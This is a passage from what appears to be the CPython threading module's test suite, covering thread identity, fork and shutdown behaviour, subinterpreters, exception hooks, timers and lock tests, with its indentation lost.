if verbose:
print('waiting for all tasks to complete')
for t in threads:
t.join()
self.assertFalse(t.is_alive())
self.assertNotEqual(t.ident, 0)
self.assertIsNotNone(t.ident)
self.assertRegex(repr(t), r'^<TestThread\(.*, stopped -?\d+\)>$')
if verbose:
print('all tasks done')
self.assertEqual(numrunning.get(), 0)
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertIsNotNone(threading.currentThread().ident)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, ())
done.wait()
self.assertEqual(ident[0], tid)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256 KiB)
def test_various_ops_small_stack(self):
if verbose:
print('with 256 KiB thread stack size...')
try:
threading.stack_size(262144)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1 MiB)
def test_various_ops_large_stack(self):
if verbose:
print('with 1 MiB thread stack size...')
try:
threading.stack_size(0x100000)
except _thread.error:
raise unittest.SkipTest(
'platform does not support changing thread stack size')
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
with support.wait_threads_exit():
tid = _thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assertIn(tid, threading._active)
self.assertIsInstance(threading._active[tid], threading._DummyThread)
#Issue 29376
self.assertTrue(threading._active[tid].is_alive())
self.assertRegex(repr(threading._active[tid]), '_DummyThread')
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
ctypes = import_module("ctypes")
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
set_async_exc.argtypes = (ctypes.c_ulong, ctypes.py_object)
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# First check it works when setting the exception from the same thread.
tid = threading.get_ident()
self.assertIsInstance(tid, int)
self.assertGreater(tid, 0)
try:
result = set_async_exc(tid, exception)
# The exception is async, so we might have to keep the VM busy until
# it notices.
while True:
pass
except AsyncExc:
pass
else:
# This code is unreachable but it reflects the intent. If we wanted
# to be smarter the above loop wouldn't be infinite.
self.fail("AsyncExc not raised")
try:
self.assertEqual(result, 1) # one thread state modified
except UnboundLocalError:
# The exception was raised too quickly for us to get the result.
pass
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = threading.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print(" started worker thread")
# Try a thread id that doesn't make sense.
if verbose:
print(" trying nonsensical thread id")
result = set_async_exc(-1, exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print(" waiting for worker thread to get started")
ret = worker_started.wait()
self.assertTrue(ret)
if verbose:
print(" verifying worker hasn't exited")
self.assertFalse(t.finished)
if verbose:
print(" attempting to raise asynch exception in worker")
result = set_async_exc(t.id, exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print(" waiting for worker to say it caught the exception")
worker_saw_exception.wait(timeout=support.SHORT_TIMEOUT)
self.assertTrue(t.finished)
if verbose:
print(" all OK -- joining worker")
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise threading.ThreadError()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(threading.ThreadError, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
def test_finalize_running_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
import_module("ctypes")
rc, out, err = assert_python_failure("-c", """if 1:
import ctypes, sys, time, _thread
# This lock is used as a simple event variable.
ready = _thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
_thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""")
self.assertEqual(rc, 42)
def test_finalize_with_trace(self):
# Issue1733757
# Avoid a deadlock when sys.settrace steps into threading._shutdown
assert_python_ok("-c", """if 1:
import sys, threading
# A deadlock-killer, to prevent the
# testsuite to hang forever
def killer():
import os, time
time.sleep(2)
print('program blocked; aborting')
os._exit(2)
t = threading.Thread(target=killer)
t.daemon = True
t.start()
# This is the trace function
def func(frame, event, arg):
threading.current_thread()
return func
sys.settrace(func)
""")
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
rc, out, err = assert_python_ok("-c", """if 1:
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print("Woke up, sleep function is:", sleep)
threading.Thread(target=child).start()
raise SystemExit
""")
self.assertEqual(out.strip(),
b"Woke up, sleep function is: <built-in function sleep>")
self.assertEqual(err, b"")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getswitchinterval()
try:
for i in range(1, 100):
sys.setswitchinterval(i * 0.0002)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertNotIn(t, l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setswitchinterval(old_interval)
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another':self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertIsNone(weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertIsNone(weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
def test_old_threading_api(self):
# Just a quick sanity check to make sure the old method names are
# still present
t = threading.Thread()
t.isDaemon()
t.setDaemon(True)
t.getName()
t.setName("name")
e = threading.Event()
e.isSet()
threading.activeCount()
def test_repr_daemon(self):
t = threading.Thread()
self.assertNotIn('daemon', repr(t))
t.daemon = True
self.assertIn('daemon', repr(t))
def test_daemon_param(self):
t = threading.Thread()
self.assertFalse(t.daemon)
t = threading.Thread(daemon=False)
self.assertFalse(t.daemon)
t = threading.Thread(daemon=True)
self.assertTrue(t.daemon)
@unittest.skipUnless(hasattr(os, 'fork'), 'needs os.fork()')
def test_fork_at_exit(self):
# bpo-42350: Calling os.fork() after threading._shutdown() must
# not log an error.
code = textwrap.dedent("""
import atexit
import os
import sys
from test.support import wait_process
# Import the threading module to register its "at fork" callback
import threading
def exit_handler():
pid = os.fork()
if not pid:
print("child process ok", file=sys.stderr, flush=True)
# child process
sys.exit()
else:
wait_process(pid, exitcode=0)
# exit_handler() will be called after threading._shutdown()
atexit.register(exit_handler)
""")
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err.rstrip(), b'child process ok')
@unittest.skipUnless(hasattr(os, 'fork'), 'test needs fork()')
def test_dummy_thread_after_fork(self):
# Issue #14308: a dummy thread in the active list doesn't mess up
# the after-fork mechanism.
code = """if 1:
import _thread, threading, os, time
def background_thread(evt):
# Creates and registers the _DummyThread instance
threading.current_thread()
evt.set()
time.sleep(10)
evt = threading.Event()
_thread.start_new_thread(background_thread, (evt,))
evt.wait()
assert threading.active_count() == 2, threading.active_count()
if os.fork() == 0:
assert threading.active_count() == 1, threading.active_count()
os._exit(0)
else:
os.wait()
"""
_, out, err = assert_python_ok("-c", code)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_is_alive_after_fork(self):
# Try hard to trigger #18418: is_alive() could sometimes be True on
# threads that vanished after a fork.
old_interval = sys.getswitchinterval()
self.addCleanup(sys.setswitchinterval, old_interval)
# Make the bug more likely to manifest.
test.support.setswitchinterval(1e-6)
for i in range(20):
t = threading.Thread(target=lambda: None)
t.start()
pid = os.fork()
if pid == 0:
os._exit(11 if t.is_alive() else 10)
else:
t.join()
support.wait_process(pid, exitcode=10)
def test_main_thread(self):
main = threading.main_thread()
self.assertEqual(main.name, 'MainThread')
self.assertEqual(main.ident, threading.current_thread().ident)
self.assertEqual(main.ident, threading.get_ident())
def f():
self.assertNotEqual(threading.main_thread().ident,
threading.current_thread().ident)
th = threading.Thread(target=f)
th.start()
th.join()
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork(self):
code = """if 1:
import os, threading
from test import support
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
else:
support.wait_process(pid, exitcode=0)
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "MainThread\nTrue\nTrue\n")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
@unittest.skipUnless(hasattr(os, 'fork'), "test needs os.fork()")
@unittest.skipUnless(hasattr(os, 'waitpid'), "test needs os.waitpid()")
def test_main_thread_after_fork_from_nonmain_thread(self):
code = """if 1:
import os, threading, sys
from test import support
def f():
pid = os.fork()
if pid == 0:
main = threading.main_thread()
print(main.name)
print(main.ident == threading.current_thread().ident)
print(main.ident == threading.get_ident())
# stdout is fully buffered because not a tty,
# we have to flush before exit.
sys.stdout.flush()
else:
support.wait_process(pid, exitcode=0)
th = threading.Thread(target=f)
th.start()
th.join()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode().replace('\r', '')
self.assertEqual(err, b"")
self.assertEqual(data, "Thread-1\nTrue\nTrue\n")
def test_main_thread_during_shutdown(self):
# bpo-31516: current_thread() should still point to the main thread
# at shutdown
code = """if 1:
import gc, threading
main_thread = threading.current_thread()
assert main_thread is threading.main_thread() # sanity check
class RefCycle:
def __init__(self):
self.cycle = self
def __del__(self):
print("GC:",
threading.current_thread() is main_thread,
threading.main_thread() is main_thread,
threading.enumerate() == [main_thread])
RefCycle()
gc.collect() # sanity check
x = RefCycle()
"""
_, out, err = assert_python_ok("-c", code)
data = out.decode()
self.assertEqual(err, b"")
self.assertEqual(data.splitlines(),
["GC: True True True"] * 2)
def test_finalization_shutdown(self):
# bpo-36402: Py_Finalize() calls threading._shutdown() which must wait
# until Python thread states of all non-daemon threads get deleted.
#
# Test similar to SubinterpThreadingTests.test_threads_join_2(), but
# test the finalization of the main interpreter.
code = """if 1:
import os
import threading
import time
import random
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_Finalize() is called.
random_sleep()
tls.x = Sleeper()
random_sleep()
threading.Thread(target=f).start()
random_sleep()
"""
rc, out, err = assert_python_ok("-c", code)
self.assertEqual(err, b"")
def test_tstate_lock(self):
# Test an implementation detail of Thread objects.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
time.sleep(0.01)
# The tstate lock is None until the thread is started
t = threading.Thread(target=f)
self.assertIs(t._tstate_lock, None)
t.start()
started.acquire()
self.assertTrue(t.is_alive())
# The tstate lock can't be acquired when the thread is running
# (or suspended).
tstate_lock = t._tstate_lock
self.assertFalse(tstate_lock.acquire(timeout=0), False)
finish.release()
# When the thread ends, the state_lock can be successfully
# acquired.
self.assertTrue(tstate_lock.acquire(timeout=support.SHORT_TIMEOUT), False)
# But is_alive() is still True: we hold _tstate_lock now, which
# prevents is_alive() from knowing the thread's end-of-life C code
# is done.
self.assertTrue(t.is_alive())
# Let is_alive() find out the C code is done.
tstate_lock.release()
self.assertFalse(t.is_alive())
# And verify the thread disposed of _tstate_lock.
self.assertIsNone(t._tstate_lock)
t.join()
def test_repr_stopped(self):
# Verify that "stopped" shows up in repr(Thread) appropriately.
started = _thread.allocate_lock()
finish = _thread.allocate_lock()
started.acquire()
finish.acquire()
def f():
started.release()
finish.acquire()
t = threading.Thread(target=f)
t.start()
started.acquire()
self.assertIn("started", repr(t))
finish.release()
# "stopped" should appear in the repr in a reasonable amount of time.
# Implementation detail: as of this writing, that's trivially true
# if .join() is called, and almost trivially true if .is_alive() is
# called. The detail we're testing here is that "stopped" shows up
# "all on its own".
LOOKING_FOR = "stopped"
for i in range(500):
if LOOKING_FOR in repr(t):
break
time.sleep(0.01)
self.assertIn(LOOKING_FOR, repr(t)) # we waited at least 5 seconds
t.join()
def test_BoundedSemaphore_limit(self):
# BoundedSemaphore should raise ValueError if released too often.
for limit in range(1, 10):
bs = threading.BoundedSemaphore(limit)
threads = [threading.Thread(target=bs.acquire)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
threads = [threading.Thread(target=bs.release)
for _ in range(limit)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertRaises(ValueError, bs.release)
@cpython_only
def test_frame_tstate_tracing(self):
# Issue #14432: Crash when a generator is created in a C thread that is
# destroyed while the generator is still used. The issue was that a
# generator contains a frame, and the frame kept a reference to the
# Python state of the destroyed C thread. The crash occurs when a trace
# function is setup.
def noop_trace(frame, event, arg):
# no operation
return noop_trace
def generator():
while 1:
yield "generator"
def callback():
if callback.gen is None:
callback.gen = generator()
return next(callback.gen)
callback.gen = None
old_trace = sys.gettrace()
sys.settrace(noop_trace)
try:
# Install a trace function
threading.settrace(noop_trace)
# Create a generator in a C thread which exits after the call
import _testcapi
_testcapi.call_in_temporary_c_thread(callback)
# Call the generator in a different Python thread, check that the
# generator didn't keep a reference to the destroyed thread state
for test in range(3):
# The trace function is still called here
callback()
finally:
sys.settrace(old_trace)
@cpython_only
def test_shutdown_locks(self):
for daemon in (False, True):
with self.subTest(daemon=daemon):
event = threading.Event()
thread = threading.Thread(target=event.wait, daemon=daemon)
# Thread.start() must add lock to _shutdown_locks,
# but only for non-daemon thread
thread.start()
tstate_lock = thread._tstate_lock
if not daemon:
self.assertIn(tstate_lock, threading._shutdown_locks)
else:
self.assertNotIn(tstate_lock, threading._shutdown_locks)
# unblock the thread and join it
event.set()
thread.join()
# Thread._stop() must remove tstate_lock from _shutdown_locks.
# Daemon threads must never add it to _shutdown_locks.
self.assertNotIn(tstate_lock, threading._shutdown_locks)
def test_locals_at_exit(self):
# bpo-19466: thread locals must not be deleted before destructors
# are called
rc, out, err = assert_python_ok("-c", """if 1:
import threading
class Atexit:
def __del__(self):
print("thread_dict.atexit = %r" % thread_dict.atexit)
thread_dict = threading.local()
thread_dict.atexit = "value"
atexit = Atexit()
""")
self.assertEqual(out.rstrip(), b"thread_dict.atexit = 'value'")
def test_leak_without_join(self):
# bpo-37788: Test that a thread which is not joined explicitly
# does not leak. Test written for reference leak checks.
def noop(): pass
with support.wait_threads_exit():
threading.Thread(target=noop).start()
# Thread.join() is not called
class ThreadJoinOnShutdown(BaseTestCase):
def _run_and_join(self, script):
script = """if 1:
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print('end of thread')
# stdout is fully buffered because not a tty, we have to flush
# before exit.
sys.stdout.flush()
\n""" + script
rc, out, err = assert_python_ok("-c", script)
data = out.decode().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
script = """if 1:
from test import support
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print('end of main')
"""
self._run_and_join(script)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
script = """if 1:
from test import support
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
# parent process
support.wait_process(childpid, exitcode=0)
sys.exit(0)
# child process
t = threading.Thread(target=joiningfunc,
args=(main_thread,))
print('end of main')
t.start()
t.join() # Should not block: main_thread is already stopped
w = threading.Thread(target=worker)
w.start()
"""
self._run_and_join(script)
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_4_daemon_threads(self):
# Check that a daemon thread cannot crash the interpreter on shutdown
# by manipulating internal structures that are being disposed of in
# the main thread.
script = """if True:
import os
import random
import sys
import time
import threading
thread_has_run = set()
def random_io():
'''Loop for a while sleeping random tiny amounts and doing some I/O.'''
while True:
with open(os.__file__, 'rb') as in_f:
stuff = in_f.read(200)
with open(os.devnull, 'wb') as null_f:
null_f.write(stuff)
time.sleep(random.random() / 1995)
thread_has_run.add(threading.current_thread())
def main():
count = 0
for _ in range(40):
new_thread = threading.Thread(target=random_io)
new_thread.daemon = True
new_thread.start()
count += 1
while len(thread_has_run) < count:
time.sleep(0.001)
# Trigger process shutdown
sys.exit(0)
main()
"""
rc, out, err = assert_python_ok('-c', script)
self.assertFalse(err)
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
@unittest.skipIf(sys.platform in platforms_to_skip, "due to known OS bug")
def test_reinit_tls_after_fork(self):
# Issue #13817: fork() would deadlock in a multithreaded program with
# the ad-hoc TLS implementation.
def do_fork_and_wait():
# just fork a child process and wait it
pid = os.fork()
if pid > 0:
support.wait_process(pid, exitcode=50)
else:
os._exit(50)
# start a bunch of threads that will fork() child processes
threads = []
for i in range(16):
t = threading.Thread(target=do_fork_and_wait)
threads.append(t)
t.start()
for t in threads:
t.join()
@unittest.skipUnless(hasattr(os, 'fork'), "needs os.fork()")
def test_clear_threads_states_after_fork(self):
# Issue #17094: check that threads states are cleared after fork()
# start a bunch of threads
threads = []
for i in range(16):
t = threading.Thread(target=lambda : time.sleep(0.3))
threads.append(t)
t.start()
pid = os.fork()
if pid == 0:
# check that threads states have been cleared
if len(sys._current_frames()) == 1:
os._exit(51)
else:
os._exit(52)
else:
support.wait_process(pid, exitcode=51)
for t in threads:
t.join()
class SubinterpThreadingTests(BaseTestCase):
def pipe(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
if hasattr(os, 'set_blocking'):
os.set_blocking(r, False)
return (r, w)
def test_threads_join(self):
# Non-daemon threads should be joined at subinterpreter shutdown
# (issue #18808)
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
def test_threads_join_2(self):
# Same as above, but a delay gets introduced after the thread's
# Python code returned but before the thread state is deleted.
# To achieve this, we register a thread-local object which sleeps
# a bit when deallocated.
r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join)
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
def test_multithread_modify_file_noerror(self):
# See issue25872
def modify_file():
with open(test.support.TESTFN, 'w', encoding='utf-8') as fp:
fp.write(' ')
traceback.format_stack()
self.addCleanup(unlink, test.support.TESTFN)
threads = [
threading.Thread(target=modify_file)
for i in range(100)
]
for t in threads:
t.start()
t.join()
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
